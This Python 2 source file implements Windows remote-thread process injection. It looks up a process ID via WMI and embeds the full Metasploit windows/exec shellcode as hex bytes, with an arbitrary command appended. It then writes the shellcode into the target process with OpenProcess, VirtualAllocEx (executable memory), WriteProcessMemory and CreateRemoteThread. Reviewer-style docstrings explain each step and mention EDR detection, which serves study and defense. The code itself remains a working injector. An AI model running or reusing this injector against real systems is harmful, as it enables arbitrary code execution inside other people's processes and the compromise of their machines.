from ctypes import *
from win32com.client import GetObject
def getPID(processname):
    """Return the PID of the first running process named *processname*, or 0.

    Queries WMI (``winmgmts:``) for ``Win32_Process`` rows whose ``Name``
    equals the argument and returns the ``ProcessId`` of the first match.
    Returns ``0`` when nothing matches.

    NOTE(review): the WQL filter is built by string interpolation, so a name
    containing a double quote or backslash would change the query; only pass
    trusted, literal process names.
    """
    wmi = GetObject('winmgmts:')
    matches = wmi.ExecQuery('select * from Win32_Process where Name="%s"' % (processname))
    if not len(matches):
        return 0
    first = matches[0]
    return first.Properties_('ProcessId').Value
def generateShellcode(cmdString):
    """Return the Metasploit ``windows/exec`` stub with *cmdString* appended.

    The literal below is a Python 2 ``str`` holding raw bytes (the file's use
    of ``str`` as a byte container and ``%`` formatting suggests it was
    written for Python 2). *cmdString* is concatenated after the stub and a
    single ``"\\x00"`` terminator is added; nothing here validates, encodes or
    length-checks the argument. The stub is the unmodified public payload
    referenced in the comment below.
    """
    # Windows Exec Shellcode Sourced from the Metasploit Framework
    # http://www.rapid7.com/db/modules/payload/windows/exec
    shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + \
        "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + \
        "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + \
        "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + \
        "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + \
        "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + \
        "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + \
        "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + \
        "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + \
        "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + \
        "\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + \
        "\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + \
        "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + \
        "\xff\xd5" + cmdString + "\x00"
    return shellcode
def injectShellcode(pid, shellcode):
    """Copy *shellcode* into process *pid* and start it on a remote thread.

    Sequence, all through ``ctypes.windll.kernel32``:
      1. ``OpenProcess(0x1F0FFF, False, pid)`` - 0x1F0FFF is the classic
         PROCESS_ALL_ACCESS mask.
      2. ``VirtualAllocEx(..., 0x1000, 0x40)`` - MEM_COMMIT with
         PAGE_EXECUTE_READWRITE, sized to ``len(shellcode)``.
      3. ``WriteProcessMemory`` copies ``shellcode`` into that region.
      4. ``CreateRemoteThread`` starts a thread at the region's base.

    Returns False only when ``CreateRemoteThread`` returns a NULL handle and
    True otherwise; the results of steps 1-3 are never checked, and the
    process handle is never closed.

    ``shellCode`` (the bytearray copy) is assigned but never used - the
    original ``shellcode`` object is what reaches ``WriteProcessMemory``.
    Under Python 3 ``bytearray(str)`` raises TypeError, consistent with
    this file targeting Python 2.

    Detection note: this OpenProcess / VirtualAllocEx(RWX) /
    WriteProcessMemory / CreateRemoteThread chain is the textbook
    remote-thread injection pattern and the usual EDR detection point
    (for example, Sysmon Event ID 8 records CreateRemoteThread).
    """
    shellCode = bytearray(shellcode)
    process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, pid) #get handle of target process
    memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, None, len(shellcode), 0x1000, 0x40) #allocate memory for shellcode in target process
    windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), None) #write shellcode into allocated memory
    if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, None, 0, None): #start thread with injected code
        return False
    return True